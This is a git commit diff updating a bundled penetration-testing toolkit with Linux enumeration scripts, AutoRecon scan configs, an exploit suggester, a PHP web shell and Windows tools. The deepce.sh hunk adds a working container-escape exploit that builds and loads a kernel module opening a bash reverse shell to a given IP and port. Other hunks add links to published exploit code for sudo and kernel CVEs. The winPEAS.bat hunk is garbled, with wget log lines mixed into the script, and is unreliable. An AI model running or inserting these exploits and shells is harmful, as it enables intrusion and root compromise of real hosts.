Project Update

2021-05-03 22:35:31 +02:00 · 2021-05-03 22:35:31 +02:00 · eadff755a0
commit eadff755a0
parent 3b9757ebeb
16 changed files with 2902 additions and 2108 deletions
--- a/LinEnum.sh
+++ b/LinEnum.sh
@ -1,6 +1,6 @@
 #!/bin/bash
 #A script to enumerate local information from a Linux host
-version="version 0.98"
+version="version 0.982"
 #@rebootuser
 #help function
@ -375,7 +375,9 @@ fi
 #current path configuration
 pathinfo=`echo $PATH 2>/dev/null`
 if [ "$pathinfo" ]; then
  pathswriteable=`ls -ld $(echo $PATH | tr ":" " ")`
  echo -e "\e[00;31m[-] Path information:\e[00m\n$pathinfo" 
  echo -e "$pathswriteable"
  echo -e "\n"
 fi
@ -737,25 +739,25 @@ if [ "$postgver" ]; then
 fi
 #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
-postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version`
+postcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon1" ]; then
  echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1" 
  echo -e "\n"
 fi
-postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version`
+postcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon11" ]; then
  echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11" 
  echo -e "\n"
 fi
-postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version`
+postcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon2" ]; then
  echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2" 
  echo -e "\n"
 fi
-postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version`
+postcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon22" ]; then
  echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22" 
  echo -e "\n"
@ -825,7 +827,8 @@ echo -e "\e[00;31m[-] Can we read/write sensitive files:\e[00m" ; ls -la /etc/pa
 echo -e "\n" 
 #search for suid files
-findsuid=`find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
+allsuid=`find / -perm -4000 -type f 2>/dev/null`
 findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$findsuid" ]; then
  echo -e "\e[00;31m[-] SUID files:\e[00m\n$findsuid" 
  echo -e "\n"
@ -837,28 +840,29 @@ if [ "$export" ] && [ "$findsuid" ]; then
 fi
 #list of 'interesting' suid files - feel free to make additions
-intsuid=`find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
+intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
 if [ "$intsuid" ]; then
  echo -e "\e[00;33m[+] Possibly interesting SUID files:\e[00m\n$intsuid" 
  echo -e "\n"
 fi
-#lists word-writable suid files
+#lists world-writable suid files
-wwsuid=`find / -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsuid" ]; then
  echo -e "\e[00;33m[+] World-writable SUID files:\e[00m\n$wwsuid" 
  echo -e "\n"
 fi
 #lists world-writable suid files owned by root
-wwsuidrt=`find / -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsuidrt" ]; then
  echo -e "\e[00;33m[+] World-writable SUID files owned by root:\e[00m\n$wwsuidrt" 
  echo -e "\n"
 fi
 #search for sgid files
-findsgid=`find / -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
+allsgid=`find / -perm -2000 -type f 2>/dev/null`
 findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$findsgid" ]; then
  echo -e "\e[00;31m[-] SGID files:\e[00m\n$findsgid" 
  echo -e "\n"
@ -870,21 +874,21 @@ if [ "$export" ] && [ "$findsgid" ]; then
 fi
 #list of 'interesting' sgid files
-intsgid=`find / -perm -2000 -type f  -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
+intsgid=`find $allsgid -perm -2000 -type f  -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
 if [ "$intsgid" ]; then
  echo -e "\e[00;33m[+] Possibly interesting SGID files:\e[00m\n$intsgid" 
  echo -e "\n"
 fi
 #lists world-writable sgid files
-wwsgid=`find / -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsgid" ]; then
  echo -e "\e[00;33m[+] World-writable SGID files:\e[00m\n$wwsgid" 
  echo -e "\n"
 fi
 #lists world-writable sgid files owned by root
-wwsgidrt=`find / -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsgidrt" ]; then
  echo -e "\e[00;33m[+] World-writable SGID files owned by root:\e[00m\n$wwsgidrt" 
  echo -e "\n"
@ -1225,6 +1229,14 @@ if [ "$checkbashhist" ]; then
  echo -e "\n"
 fi
 #any .bak files that may be of interest
 bakfiles=`find / -name *.bak -type f 2</dev/null`
 if [ "$bakfiles" ]; then
  echo -e "\e[00;31m[-] Location and Permissions (if accessible) of .bak file(s):\e[00m"
  for bak in `echo $bakfiles`; do ls -la $bak;done
  echo -e "\n"
 fi
 #is there any mail accessible
 readmail=`ls -la /var/mail 2>/dev/null`
 if [ "$readmail" ]; then
--- a/autorecon.py
+++ b/autorecon.py
@ -23,32 +23,103 @@ import sys
 import time
 import toml
 import termios
 import appdirs
 import shutil
-def _quit():
+# Globals
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS)
 atexit.register(_quit)
 TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno())
 verbose = 0
-nmap = '-vv --reason -Pn'
+nmap = "-vv --reason -Pn"
-srvname = ''
+srvname = ""
 heartbeat_interval = 60
 port_scan_profile = None
 port_scan_profiles_config = None
 service_scans_config = None
 global_patterns = []
-
+username_wordlist = "/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
-username_wordlist = '/usr/share/seclists/Usernames/top-usernames-shortlist.txt'
+password_wordlist = "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
 password_wordlist = '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
 rootdir = os.path.dirname(os.path.realpath(__file__))
 single_target = False
 only_scans_dir = False
 def _quit():
    TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno())
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS)
 def _init():
    global port_scan_profiles_config
    global service_scans_config
    global global_patterns
    atexit.register(_quit)
    appname = "AutoRecon"
    rootdir = os.path.dirname(os.path.realpath(__file__))
    default_config_dir = os.path.join(rootdir, "config")
    config_dir = appdirs.user_config_dir(appname)
    port_scan_profiles_config_file = os.path.join(config_dir, "port-scan-profiles.toml")
    service_scans_config_file = os.path.join(config_dir, "service-scans.toml")
    global_patterns_config_file = os.path.join(config_dir, "global-patterns.toml")
    # Confirm this directory exists; if not, populate it with the default configurations
    if not os.path.exists(config_dir):
        os.makedirs(config_dir, exist_ok=True)
        shutil.copy(
            os.path.join(default_config_dir, "port-scan-profiles-default.toml"),
            port_scan_profiles_config_file,
        )
        shutil.copy(
            os.path.join(default_config_dir, "service-scans-default.toml"),
            service_scans_config_file,
        )
        shutil.copy(
            os.path.join(default_config_dir, "global-patterns-default.toml"),
            global_patterns_config_file,
        )
    with open(port_scan_profiles_config_file, "r") as p:
        try:
            port_scan_profiles_config = toml.load(p)
            if len(port_scan_profiles_config) == 0:
                fail(
                    "There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file."
                )
        except toml.decoder.TomlDecodeError as e:
            fail(
                "Error: Couldn't parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags."
            )
    with open(service_scans_config_file, "r") as c:
        try:
            service_scans_config = toml.load(c)
        except toml.decoder.TomlDecodeError as e:
            fail(
                "Error: Couldn't parse service-scans.toml config file. Check syntax and duplicate tags."
            )
    with open(global_patterns_config_file, "r") as p:
        try:
            global_patterns = toml.load(p)
            if "pattern" in global_patterns:
                global_patterns = global_patterns["pattern"]
            else:
                global_patterns = []
        except toml.decoder.TomlDecodeError as e:
            fail(
                "Error: Couldn't parse global-patterns.toml config file. Check syntax and duplicate tags."
            )
    if "username_wordlist" in service_scans_config:
        if isinstance(service_scans_config["username_wordlist"], str):
            username_wordlist = service_scans_config["username_wordlist"]
    if "password_wordlist" in service_scans_config:
        if isinstance(service_scans_config["password_wordlist"], str):
            password_wordlist = service_scans_config["password_wordlist"]
 def e(*args, frame_index=1, **kvargs):
    frame = sys._getframe(frame_index)
@ -146,40 +217,6 @@ def calculate_elapsed_time(start_time):
    return ', '.join(elapsed_time)
 port_scan_profiles_config_file = 'port-scan-profiles.toml'
 with open(os.path.join(rootdir, 'autorecon_config', port_scan_profiles_config_file), 'r') as p:
    try:
        port_scan_profiles_config = toml.load(p)
        if len(port_scan_profiles_config) == 0:
            fail('There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file.')
    except toml.decoder.TomlDecodeError as e:
        fail('Error: Couldn\'t parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags.')
 with open(os.path.join(rootdir, 'autorecon_config', 'service-scans.toml'), 'r') as c:
    try:
        service_scans_config = toml.load(c)
    except toml.decoder.TomlDecodeError as e:
        fail('Error: Couldn\'t parse service-scans.toml config file. Check syntax and duplicate tags.')
 with open(os.path.join(rootdir, 'autorecon_config', 'global-patterns.toml'), 'r') as p:
    try:
        global_patterns = toml.load(p)
        if 'pattern' in global_patterns:
            global_patterns = global_patterns['pattern']
        else:
            global_patterns = []
    except toml.decoder.TomlDecodeError as e:
        fail('Error: Couldn\'t parse global-patterns.toml config file. Check syntax and duplicate tags.')
 if 'username_wordlist' in service_scans_config:
    if isinstance(service_scans_config['username_wordlist'], str):
        username_wordlist = service_scans_config['username_wordlist']
 if 'password_wordlist' in service_scans_config:
    if isinstance(service_scans_config['password_wordlist'], str):
        password_wordlist = service_scans_config['password_wordlist']
 async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE):
    address = target.address
@ -595,7 +632,7 @@ async def scan_services(loop, semaphore, target):
                                            pending.add(asyncio.ensure_future(run_cmd(semaphore, e(command), target, tag=tag, patterns=patterns)))
-def scan_host(target, concurrent_scans):
+def scan_host(target, concurrent_scans, outdir):
    start_time = time.time()
    info('Scanning target {byellow}{target.address}{rst}')
@ -655,8 +692,18 @@ class Target:
        self.lock = None
        self.running_tasks = []
 if __name__ == '__main__':
 def main():
    global single_target
    global only_scans_dir
    global port_scan_profile
    global heartbeat_interval
    global nmap
    global srvname
    global verbose
    _init()
    parser = argparse.ArgumentParser(description='Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets.')
    parser.add_argument('targets', action='store', help='IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar) to scan.', nargs="*")
    parser.add_argument('-t', '--targets', action='store', type=str, default='', dest='target_file', help='Read targets from file.')
@ -814,7 +861,7 @@ if __name__ == '__main__':
        for address in targets:
            target = Target(address)
-            futures.append(executor.submit(scan_host, target, concurrent_scans))
+            futures.append(executor.submit(scan_host, target, concurrent_scans, outdir))
        try:
            for future in as_completed(futures):
@ -827,3 +874,8 @@ if __name__ == '__main__':
        elapsed_time = calculate_elapsed_time(start_time)
        info('{bgreen}Finished scanning all targets in {elapsed_time}!{rst}')
 if __name__ == '__main__':
    main()
--- a/autorecon_config/service-scans.toml
+++ b/autorecon_config/service-scans.toml
@ -126,12 +126,21 @@ ignore-service-names = [
    command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"'
    [[http.scan]]
-    name = 'nikto'
+    name = 'ffuf'
-    command = 'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"'
+    command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt'
-    [[http.scan]]
+    [[http.manual]]
-    name = 'gobuster'
+    description = '(nikto) old but generally reliable web server enumeration tool'
-    command = 'if [[ `gobuster -h 2>&1 | grep -F "mode (dir)"` ]]; then gobuster -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster.txt"; else gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster.txt"; fi'
+    commands = [
        'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"'
    ]
    [[http.manual]]
    description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:'
    commands = [
        'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt',
        'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt'
    ]
    [[http.manual]]
    description = '(dirsearch) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:'
--- a/BIN
+++ b/BIN
--- a/BIN
+++ b/BIN
--- a/deepce.sh
+++ b/deepce.sh
@ -67,6 +67,7 @@ Usage: ${0##*/} [OPTIONS...]
    SOCK                 use an exposed docker sock to create a new container and mount root partition to priv esc
    CVE-2019-5746
    CVE-2019-5021
    SYS_MODULE           Exploit the SYS_MODULE privilege to create a malicious kernel module and obtain root on the host
  ${DG}[Payloads & Options]$NC
  -i, --ip               The local host IP address for reverse shells to connect to
@ -125,6 +126,8 @@ TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to
 TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs"
 TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary"
 TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
 DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
 DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
@ -1112,6 +1115,112 @@ exploitDockerSock() {
  # TODO: Tidy up command
 }
 exploitSysModule(){
  printSection "Exploiting SYS_MODULE"
  printTip "$TIP_SYS_MODULE"
  if ! [ -x "$(command -v capsh)" ]; then
    printError "capsh is required to run this exploit."
    exit 1
  fi
  if ! [ -x "$(command -v make)" ]; then
    printError "make is required to run this exploit."
    exit 1
  fi
  if ! [ -x "$(command -v insmod)" ]; then
    printError "insmod is required to run this exploit."
    exit 1
  fi
  if ! [ -d "/lib/modules/$(uname -r)" ]; then
    printError "Linux headers for $(uname -r) are required to run this exploit."
    exit 1
  fi
  caps=$(capsh --print)
  if ! echo "$caps" | grep -qa "cap_sys_module" ; then
    printError "We don't have the SYS_MODULE capability, which is required for this exploit"
    exit 1
  fi
  if [ -z "$ip" ]; then
    printError "Missing reverse shell IP : use --ip"
    exit 1
  fi
  if [ -z "$port" ]; then
    printError "Missing reverse shell port : use --port"
    exit 1
  fi
  module_name=$(tr -dc A-Za-z </dev/urandom | head -c 13)
  sys_cwd=$(pwd)
  mkdir /dev/shm/rev && cd /dev/shm/rev || exit 1
  printQuestion "Writing scripts..."
  # POC modified from https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
 cat << EOF > "$module_name.c"
 #include <linux/kmod.h>
 #include <linux/module.h>
 MODULE_LICENSE("GPL");
 MODULE_AUTHOR("AttackDefense");
 MODULE_DESCRIPTION("LKM reverse shell module");
 MODULE_VERSION("1.0");
 char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL};
 static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
 static int __init ${module_name}_init(void) {
 return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
 }
 static void __exit ${module_name}_exit(void) {
 }
 module_init(${module_name}_init);
 module_exit(${module_name}_exit);
 EOF
 cat << EOF > Makefile
 obj-m +=${module_name}.o
 all:
 	make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
 clean:
 	make -C /lib/modules/$(uname -r)/build M=$(pwd) clean
 EOF
  printSuccess "Done"
  printQuestion "Compiling kernel module..."
  if make 1>/dev/null ; then
    printSuccess "Done"
  else
    printError "Failed to make. Do you have all the required libraries installed?"
    exit 1
  fi
  printQuestion "Mounting kernel module..."
  if insmod "$module_name.ko" 1>/dev/null ; then
    printSuccess "Done"
  else
    printError "Failed to mount module"
    exit 1
  fi
  printQuestion "Cleaning up..."
  rm -r /dev/shm/rev
  cd "$sys_cwd" || exit
  printSuccess "Done"
  printSuccess "Check your reverse shell handler!"
 }
 ###########################################
 #--------------) Arg Parse (--------------#
 ###########################################
@ -1246,6 +1355,9 @@ if [ "$exploit" ]; then
  sock | SOCK)
    exploitDockerSock
    ;;
  sys | SYS | sys_module | SYS_MODULE)
    exploitSysModule
    ;;
  *)
    echo "Unknown exploit $1"
    exit 1
--- a/linpeas.sh
+++ b/linpeas.sh
--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@ -256,21 +256,39 @@ EOF
 )
 EXPLOITS[((n++))]=$(cat <<EOF
-Name: ${txtgrn}[CVE-2009-2698]${txtrst} udp_sendmsg (by spender)
+Name: ${txtgrn}[CVE-2009-2698]${txtrst} the rebel (udp_sendmsg)
 Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19
-Tags:
+Tags: debian=4
 Rank: 1
 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz
 exploit-db: 9574
 analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
 author: spender
 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
 EOF
 )
 EXPLOITS[((n++))]=$(cat <<EOF
-Name: ${txtgrn}[CVE-2009-2698]${txtrst} udp_sendmsg
+Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg
-Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19
+Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
 Tags: debian=4
 Rank: 1
 exploit-db: 9575
 analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
 author: andi
 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
 EOF
 )
 EXPLOITS[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2009-2698]${txtrst} katon (udp_sendmsg)
 Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
 Tags: debian=4
 Rank: 1
 src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c
 analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
 author: VxHell Labs
 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
 EOF
 )
@ -279,7 +297,10 @@ Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data
 Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
 Tags: fedora=4|5|6,RHEL=4
 Rank: 1
 analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
 exploit-db: 9542
 author: p0c73n1
 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
 EOF
 )
@ -871,6 +892,18 @@ author: Vitaly 'vnik' Nikolenko
 EOF
 )
 EXPLOITS[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2021-27365]${txtrst} linux-iscsi
 Reqs: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y
 Tags: RHEL=8
 Rank: 1
 analysis-url: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
 src-url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
 Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
 author: GRIMM
 EOF
 )
 ############ USERSPACE EXPLOITS ###########################
 n=0
@ -1399,6 +1432,38 @@ Comments: Requires an administrator to login via the web interface.
 EOF
 )
 EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit
 Reqs: pkg=sudo,ver<1.9.5p2
 Tags: mint=19,ubuntu=18|20, debian=10
 Rank: 1
 analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
 src-url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 author: blasty
 EOF
 )
 EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit 2
 Reqs: pkg=sudo,ver<1.9.5p2
 Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
 Rank: 1
 analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
 src-url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 author: worawit
 EOF
 )
 EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2017-5618]${txtrst} setuid screen v4.5.0 LPE
 Reqs: pkg=screen,ver==4.5.0
 Tags: 
 Rank: 1
 analysis-url: https://seclists.org/oss-sec/2017/q1/184
 exploit-db: https://www.exploit-db.com/exploits/41154
 EOF
 )
 ###########################################################
 ## security related HW/kernel features
 ###########################################################
--- a/lse.sh
+++ b/lse.sh
--- a/p0wny-shell.php
+++ b/p0wny-shell.php
@ -119,6 +119,22 @@ if (isset($_GET["feature"])) {
                font-family: monospace;
            }
            *::-webkit-scrollbar-track {
                border-radius: 8px;
                background-color: #353535;
            }
            *::-webkit-scrollbar {
                width: 8px;
                height: 8px;
            }
            *::-webkit-scrollbar-thumb {
                border-radius: 8px;
                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
                background-color: #bcbcbc;
            }
            #shell {
                background: #222;
                max-width: 800px;
@ -146,7 +162,8 @@ if (isset($_GET["feature"])) {
            @media (max-width: 991px) {
                #shell-logo {
-                    display: none;
+                    font-size: 6px;
                    margin: -25px 0;
                }
                html, body, #shell {
@ -166,6 +183,12 @@ if (isset($_GET["feature"])) {
                }
            }
            @media (max-width: 320px) {
                #shell-logo {
                    font-size: 5px;
                }
            }
            .shell-prompt {
                font-weight: bold;
                color: #75DF0B;
@ -231,6 +254,10 @@ if (isset($_GET["feature"])) {
                eShellContent.scrollTop = eShellContent.scrollHeight;
            }
            function _defer(callback) {
                setTimeout(callback, 0);
            }
            function featureShell(command) {
                _insertCommand(command);
@ -372,8 +399,10 @@ if (isset($_GET["feature"])) {
                        if (historyPosition > 0) {
                            historyPosition--;
                            eShellCmdInput.blur();
                            eShellCmdInput.focus();
                            eShellCmdInput.value = commandHistory[historyPosition];
                            _defer(function() {
                                eShellCmdInput.focus();
                            });
                        }
                        break;
                    case "ArrowDown":
@ -427,6 +456,20 @@ if (isset($_GET["feature"])) {
                xhr.send(getQueryString());
            }
            document.onclick = function(event) {
                event = event || window.event;
                var selection = window.getSelection();
                var target = event.target || event.srcElement;
                if (target.tagName === "SELECT") {
                    return;
                }
                if (!selection.toString()) {
                    eShellCmdInput.focus();
                }
            };
            window.onload = function() {
                eShellCmdInput = document.getElementById("shell-cmd");
                eShellContent = document.getElementById("shell-content");
--- a/unix-privesc-check.sh
+++ b/unix-privesc-check.sh
--- a/update.sh
+++ b/update.sh
@ -0,0 +1,38 @@
 #!/bin/bash
 echo "Updating scripts…"
 wget --no-verbose https://raw.githubusercontent.com/initstring/uptux/master/uptux.py -O uptux.py
 wget --no-verbose https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O unix-privesc-check.sh
 wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 -O pspy64
 wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 -O pspy
 wget --no-verbose https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O p0wny-shell.php
 wget --no-verbose https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh -O lse.sh
 wget --no-verbose https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh
 wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh -O linpeas.sh
 wget --no-verbose https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh -O LinEnum.sh
 wget --no-verbose https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O deepce.sh
 echo "Updating autorecon…"
 wget --no-verbose https://raw.githubusercontent.com/Tib3rius/AutoRecon/master/src/autorecon/autorecon.py -O autorecon.py
 wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/global-patterns-default.toml -O autorecon_config/global-patterns.toml
 wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/port-scan-profiles-default.toml -O autorecon_config/port-scan-profiles.toml
 wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/service-scans-default.toml -O autorecon_config/service-scans.toml
 echo "Updating Chisel…"
 location=$(curl -s -I https://github.com/jpillora/chisel/releases/latest | grep -i "location: " | awk '{ print $2 }')
 if [[ "$location" =~ ^https://github.com/jpillora/chisel/releases/tag/v(.*) ]]; then
  chisel_version=${BASH_REMATCH[1]}
  chisel_version=${chisel_version%%[[:space:]]}
  curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz"    | gzip -d > chisel
  curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz"  | gzip -d > chisel64
  curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz"  | gzip -d > win/chisel.exe
  curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz"  | gzip -d > win/chisel64.exe
 fi
 # TODO: add others
 echo "Updating windows tools…"
 wget --no-verbose https://live.sysinternals.com/accesschk.exe -O win/accesschk.exe
 wget --no-verbose https://live.sysinternals.com/accesschk64.exe -O win/accesschk64.exe
 wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe -O win/winPEAS.exe
 wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe -O win/winPEASx64.exe
 wget --no-verbose https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat -O win/winPEAS.bat
--- a/win/chisel.exe
+++ b/win/chisel.exe
--- a/win/chisel64.exe
+++ b/win/chisel64.exe
--- a/win/winPEAS.bat
+++ b/win/winPEAS.bat
@ -1,12 +1,654 @@
--2021-05-03 18:13:46--  https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
+@ECHO OFF & SETLOCAL EnableDelayedExpansion
-CA-Zertifikat »/etc/ssl/certs/ca-certificates.crt« wurde geladen
+TITLE WinPEAS - Windows local Privilege Escalation Awesome Script
-Auflösen des Hostnamens raw.githubusercontent.com (raw.githubusercontent.com)… 185.199.111.133, 185.199.110.133, 185.199.109.133, ...
+COLOR 0F
-Verbindungsaufbau zu raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443 … verbunden.
+CALL :SetOnce
 HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
 Länge: 35107 (34K) [text/plain]
 Wird in »winPEAS.bat.1« gespeichert.
-     0K .......... .......... .......... ....                 100% 13,2M=0,003s
+REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
